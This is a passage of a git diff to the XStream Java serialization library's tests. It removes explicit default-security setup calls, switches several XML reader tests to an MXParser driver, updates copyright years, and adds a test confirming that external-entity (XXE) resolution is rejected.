+ * Copyright (C) 2006, 2007, 2013, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -24,7 +24,6 @@ public class EnumSetConverterTest extends TestCase {
protected void setUp() throws Exception {
super.setUp();
xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
}
public void testPutsEnumsInCompactCommaSeparatedString() {
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumToStringConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumToStringConverterTest.java
index 6ded47c53d7f715c9ad0279dddaad36970590476..bf3ef1d8a68fc2b1b85dad912d0a21118adf5f3c 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumToStringConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumToStringConverterTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2013, 2017 XStream Committers.
+ * Copyright (C) 2013, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -32,7 +32,6 @@ public class EnumToStringConverterTest extends TestCase {
protected void setUp() throws Exception {
super.setUp();
xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
xstream.alias("simple", SimpleEnum.class);
xstream.alias("big", BigEnum.class);
xstream.alias("polymorphic", PolymorphicEnum.class);
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/SimpleEnum.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/SimpleEnum.java
index 2b691d1c39906e49c87839bb24246f8422808ff9..1cfd8c9658711612e4838840c80bc13a66ce2aa0 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/SimpleEnum.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/SimpleEnum.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007 XStream Committers.
+ * Copyright (C) 2006, 2007, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -11,6 +11,6 @@
*/
package com.thoughtworks.xstream.converters.enums;
-enum SimpleEnum {
+public enum SimpleEnum {
RED, GREEN, BLUE;
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/extended/FontConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/extended/FontConverterTest.java
index c4946ff62a0cac95f7d0e6fdaca2eab6ad665684..a5c4cec0f8dd880376ee9386d83437afbf9fdbdf 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/extended/FontConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/extended/FontConverterTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2004 Joe Walnes.
- * Copyright (C) 2006, 2007, 2013, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2013, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -44,7 +44,6 @@ public class FontConverterTest extends TestCase {
super.setUp();
// fonts should be serializable also with pure Java
xstream = new XStream(new PureJavaReflectionProvider());
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypes(new Class[] {Font.class, TextAttribute.class, TransformAttribute.class, AffineTransform.class});
in = new Font("Arial", Font.BOLD, 20);
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/extended/GregorianCalendarConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/extended/GregorianCalendarConverterTest.java
index 17044fdf34b4757f89b0a2262296f74c0ccd02a5..d9e1724e404fdc638a6409e86568173134b11265 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/extended/GregorianCalendarConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/extended/GregorianCalendarConverterTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -26,7 +26,6 @@ public class GregorianCalendarConverterTest extends TestCase {
public void testCalendar() {
final Calendar cal = Calendar.getInstance(TimeZone.getTimeZone("UTC"));
final XStream xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
final String xml = xstream.toXML(cal);
final Calendar serialized = (Calendar)xstream.fromXML(xml);
assertEquals(cal, serialized);
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/extended/ISO8601SqlTimestampConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/extended/ISO8601SqlTimestampConverterTest.java
index fafb8660a042ed27a8a57beb95f4337a34da892c..0ee476a44a433a9614db5a80478f062825ff4f7c 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/extended/ISO8601SqlTimestampConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/extended/ISO8601SqlTimestampConverterTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -43,7 +43,6 @@ public class ISO8601SqlTimestampConverterTest extends TestCase {
private XStream createXStream() {
XStream xs = new XStream();
- XStream.setupDefaultSecurity(xs);
return xs;
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/javabean/JavaBeanConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/javabean/JavaBeanConverterTest.java
index 111aee90d742e62ba34ccfa88372a71d6a5a3336..fb9a4182627149319fb8b32a870b50f80d857536 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/javabean/JavaBeanConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/javabean/JavaBeanConverterTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2010, 2011, 2013, 2014, 2015, 2016, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2010, 2011, 2013, 2014, 2015, 2016, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -22,7 +22,6 @@ public class JavaBeanConverterTest extends TestCase {
private XStream createXStream() {
XStream xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypesByWildcard(new String[] {getClass().getName()+"$*"});
return xstream;
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/reflection/ReflectionConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/reflection/ReflectionConverterTest.java
index d0280eb78c4c16221096a76f9a66417b73ad5ac8..d3f08d0260ffd741488885162b3c3aec7b4f5f33 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/reflection/ReflectionConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/reflection/ReflectionConverterTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2004, 2005, 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2010, 2013, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2010, 2013, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -73,7 +73,6 @@ public class ReflectionConverterTest extends TestCase {
private XStream createXStream() {
XStream xstream = new XStream(new XppDriver());
- XStream.setupDefaultSecurity(xstream);
return xstream;
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/reflection/SerializableConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/reflection/SerializableConverterTest.java
index a81f63246c25052f5e87cde99de239ebc35eafa1..4a59dc4b63625423d17a513d69633fb7e358cb44 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/reflection/SerializableConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/reflection/SerializableConverterTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2007, 2014, 2017 XStream Committers.
+ * Copyright (C) 2007, 2014, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -29,7 +29,6 @@ public class SerializableConverterTest extends TestCase {
private XStream createXStream() {
XStream xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypesByWildcard(new String[] {getClass().getName()+"$*"});
return xstream;
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/DriverEndToEndTestSuite.java b/xstream/src/test/com/thoughtworks/xstream/io/DriverEndToEndTestSuite.java
index d99035aed21753925e0610a7825b64506b1017a2..f5aa9063e1bb761490a7394712ae7bb116e335ee 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/DriverEndToEndTestSuite.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/DriverEndToEndTestSuite.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2011, 2013, 2016, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2011, 2013, 2016, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -27,6 +27,8 @@ import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.io.xml.JDomDriver;
import com.thoughtworks.xstream.io.xml.KXml2DomDriver;
import com.thoughtworks.xstream.io.xml.KXml2Driver;
+import com.thoughtworks.xstream.io.xml.MXParserDomDriver;
+import com.thoughtworks.xstream.io.xml.MXParserDriver;
import com.thoughtworks.xstream.io.xml.StaxDriver;
import com.thoughtworks.xstream.io.xml.WstxDriver;
import com.thoughtworks.xstream.io.xml.XomDriver;
@@ -80,6 +82,8 @@ public class DriverEndToEndTestSuite extends TestSuite {
}
addDriverTest(new WstxDriver());
addDriverTest(new XomDriver());
+ addDriverTest(new MXParserDomDriver());
+ addDriverTest(new MXParserDriver());
addDriverTest(new Xpp3DomDriver());
addDriverTest(new Xpp3Driver());
addDriverTest(new XppDomDriver());
@@ -98,7 +102,6 @@ public class DriverEndToEndTestSuite extends TestSuite {
private void testObject(final HierarchicalStreamDriver driver) {
final XStream xstream = new XStream(driver);
- xstream.setupDefaultSecurity(xstream);
xstream.allowTypes(new Class[] { SampleLists.class });
xstream.registerConverter(new CollectionConverter(xstream.getMapper()) {
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/binary/BinaryStreamTest.java b/xstream/src/test/com/thoughtworks/xstream/io/binary/BinaryStreamTest.java
index d34962bfc2f2eddb632d28990aa93f120302e6ad..a01065a55755b52c0d0aa4b39cb7def77b8a5982 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/binary/BinaryStreamTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/binary/BinaryStreamTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2011, 2015, 2016 XStream Committers.
+ * Copyright (C) 2006, 2007, 2011, 2015, 2016, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -16,7 +16,7 @@ import com.thoughtworks.xstream.io.HierarchicalStreamReader;
import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
import com.thoughtworks.xstream.io.copy.HierarchicalStreamCopier;
import com.thoughtworks.xstream.io.xml.AbstractXMLReaderTest;
-import com.thoughtworks.xstream.io.xml.Xpp3Driver;
+import com.thoughtworks.xstream.io.xml.MXParserDriver;
import java.io.ByteArrayOutputStream;
import java.io.StringReader;
@@ -34,7 +34,7 @@ public class BinaryStreamTest extends AbstractXMLReaderTest {
protected HierarchicalStreamReader createReader(String xml) throws Exception {
// Transmogrify XML input into binary format.
HierarchicalStreamReader xmlReader =
- new Xpp3Driver().createReader(new StringReader(xml));
+ new MXParserDriver().createReader(new StringReader(xml));
ByteArrayOutputStream buffer = new ByteArrayOutputStream();
HierarchicalStreamWriter binaryWriter = new BinaryStreamWriter(buffer);
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/copy/HierarchicalStreamCopierTest.java b/xstream/src/test/com/thoughtworks/xstream/io/copy/HierarchicalStreamCopierTest.java
index 9f65b80ad127f17c68dd82206390f7a0c2911483..3b94d7cbd8891802a52c290019488af26780ba97 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/copy/HierarchicalStreamCopierTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/copy/HierarchicalStreamCopierTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2011, 2015, 2016 XStream Committers.
+ * Copyright (C) 2006, 2007, 2011, 2015, 2016, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -16,7 +16,7 @@ import com.thoughtworks.xstream.io.HierarchicalStreamReader;
import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
import com.thoughtworks.xstream.io.xml.AbstractXMLReaderTest;
import com.thoughtworks.xstream.io.xml.CompactWriter;
-import com.thoughtworks.xstream.io.xml.Xpp3Driver;
+import com.thoughtworks.xstream.io.xml.MXParserDriver;
import com.thoughtworks.xstream.io.xml.XppReader;
import com.thoughtworks.xstream.io.xml.xppdom.XppFactory;
@@ -35,7 +35,7 @@ public class HierarchicalStreamCopierTest extends AbstractXMLReaderTest {
// factory method - overriding base class.
protected HierarchicalStreamReader createReader(String xml) throws Exception {
HierarchicalStreamReader sourceReader =
- new Xpp3Driver().createReader(new StringReader(xml));
+ new MXParserDriver().createReader(new StringReader(xml));
StringWriter buffer = new StringWriter();
HierarchicalStreamWriter destinationWriter = new CompactWriter(buffer);
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/json/JettisonMappedXmlDriverTest.java b/xstream/src/test/com/thoughtworks/xstream/io/json/JettisonMappedXmlDriverTest.java
index 03164bf069631534f5332650fae2ccddb87e55e8..4a1e566ef03910d94d723a4bee64c57ebb301510 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/json/JettisonMappedXmlDriverTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/json/JettisonMappedXmlDriverTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2007, 2008, 2009, 2010, 2011, 2013, 2016, 2017, 2018 XStream Committers.
+ * Copyright (C) 2007, 2008, 2009, 2010, 2011, 2013, 2016, 2017, 2018, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -58,7 +58,6 @@ public class JettisonMappedXmlDriverTest extends TestCase {
super.setUp();
TimeZoneChanger.change("UTC");
xstream = new XStream(new JettisonMappedXmlDriver());
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypesByWildcard(new String[]{
getClass().getName() + "$*", "com.thoughtworks.acceptance.objects.*"});
xstream.alias("category", Category.class);
@@ -94,7 +93,6 @@ public class JettisonMappedXmlDriverTest extends TestCase {
Configuration config = new Configuration();
setTypeConverter.invoke(config, new Object[]{typeConverter});
xstream = new XStream(new JettisonMappedXmlDriver(config));
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypesByWildcard(new String[]{"com.thoughtworks.acceptance.objects.*"});
xstream.alias("product", Product.class);
Product product = new Product("Banana", "123", 23.00);
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/xml/JDom2AcceptanceTest.java b/xstream/src/test/com/thoughtworks/xstream/io/xml/JDom2AcceptanceTest.java
index 75845830ffc0759eb63b9d0c8a6e675d5cba54a5..16384eae56fb1905a97e53dff495814a71c27919 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/xml/JDom2AcceptanceTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/xml/JDom2AcceptanceTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2013, 2017 XStream Committers.
+ * Copyright (C) 2013, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -31,7 +31,6 @@ public class JDom2AcceptanceTest extends TestCase {
protected void setUp() throws Exception {
super.setUp();
xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypesByWildcard(new String[] {"com.thoughtworks.acceptance.someobjects.*"});
xstream.alias("x", X.class);
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/xml/JDomAcceptanceTest.java b/xstream/src/test/com/thoughtworks/xstream/io/xml/JDomAcceptanceTest.java
index e29274982d8d6560f1ca80ecff7a80753ec198e2..11d32462fc29d52fb69fb9877e85646ca18d7c84 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/xml/JDomAcceptanceTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/xml/JDomAcceptanceTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2004 Joe Walnes.
- * Copyright (C) 2006, 2007, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -32,7 +32,6 @@ public class JDomAcceptanceTest extends TestCase {
protected void setUp() throws Exception {
super.setUp();
xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypesByWildcard(new String[] {"com.thoughtworks.acceptance.someobjects.*"});
xstream.alias("x", X.class);
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/xml/MXParserReaderTest.java b/xstream/src/test/com/thoughtworks/xstream/io/xml/MXParserReaderTest.java
new file mode 100644
index 0000000000000000000000000000000000000000..1f071068b6b62bdccb44265ce6a07b9182fd1f5b
--- /dev/null
+++ b/xstream/src/test/com/thoughtworks/xstream/io/xml/MXParserReaderTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 XStream Committers.
+ * All rights reserved.
+ *
+ * The software in this package is published under the terms of the BSD
+ * style license a copy of which has been included with this distribution in
+ * the LICENSE.txt file.
+ *
+ * Created on 2. January 2021 by Joerg Schaible
+ */
+package com.thoughtworks.xstream.io.xml;
+
+import com.thoughtworks.xstream.XStreamException;
+import com.thoughtworks.xstream.io.HierarchicalStreamDriver;
+import com.thoughtworks.xstream.io.HierarchicalStreamReader;
+
+import java.io.StringReader;
+
+public class MXParserReaderTest extends AbstractXMLReaderTest {
+
+ private HierarchicalStreamDriver driver = new MXParserDriver();
+
+ // factory method
+ protected HierarchicalStreamReader createReader(String xml) throws Exception {
+ return driver.createReader(new StringReader(xml));
+ }
+
+ public void testIsXXEVulnerableWithExternalGeneralEntity() throws Exception {
+ try {
+ super.testIsXXEVulnerableWithExternalGeneralEntity();
+ fail("Thrown " + XStreamException.class.getName() + " expected");
+ } catch (final XStreamException e) {
+ final String message = e.getCause().getMessage();
+ if (message.indexOf("resolve entity") < 0) {
+ throw e;
+ }
+ }
+ }
+
+ // inherits tests from superclass
+}
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/xml/StaxDriverTest.java b/xstream/src/test/com/thoughtworks/xstream/io/xml/StaxDriverTest.java
index a80335c70869f138394c8441b64adb8273470c54..51e3b9935da619fd16277756245ad87765eb54d2 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/xml/StaxDriverTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/xml/StaxDriverTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2006, 2007, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -51,7 +51,6 @@ public class StaxDriverTest extends AbstractAcceptanceTest {
System.setProperty(XMLOutputFactory.class.getName(), XMLOutputFactoryBase.class.getName());
final MyStaxDriver driver = new MyStaxDriver();
xstream = new XStream(driver);
- XStream.setupDefaultSecurity(xstream);
assertBothWays("Hi", "<?xml version='1.0' encoding='utf-8'?><string>Hi</string>");
assertTrue(driver.createStaxReaderCalled);
assertTrue(driver.createStaxWriterCalled);
diff --git a/xstream/src/test/com/thoughtworks/xstream/persistence/FilePersistenceStrategyTest.java b/xstream/src/test/com/thoughtworks/xstream/persistence/FilePersistenceStrategyTest.java
index dda77606d9330f94bed8478734d4714f3b885dd5..1604df88a4bf4694e110c20ad68e0e0c218eda29 100644
--- a/xstream/src/test/com/thoughtworks/xstream/persistence/FilePersistenceStrategyTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/persistence/FilePersistenceStrategyTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2008, 2009, 2017 XStream Committers.
+ * Copyright (C) 2008, 2009, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -61,7 +61,6 @@ public class FilePersistenceStrategyTest extends TestCase {
private XStream createXStream() {
XStream xstream = new XStream(new DomDriver());
- XStream.setupDefaultSecurity(xstream);
return xstream;
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/persistence/FileStreamStrategyTest.java b/xstream/src/test/com/thoughtworks/xstream/persistence/FileStreamStrategyTest.java
index 30fc916cb169dd111da12171d0a8b7d46b42174c..01f51723d2ea7fa68dd863b924d1e79866d05eab 100644
--- a/xstream/src/test/com/thoughtworks/xstream/persistence/FileStreamStrategyTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/persistence/FileStreamStrategyTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2006 Joe Walnes.
- * Copyright (C) 2007, 2008, 2009, 2017 XStream Committers.
+ * Copyright (C) 2007, 2008, 2009, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -59,7 +59,6 @@ public class FileStreamStrategyTest extends TestCase {
private XStream createXStream() {
XStream xstream = new XStream(new DomDriver());
- XStream.setupDefaultSecurity(xstream);
return xstream;
}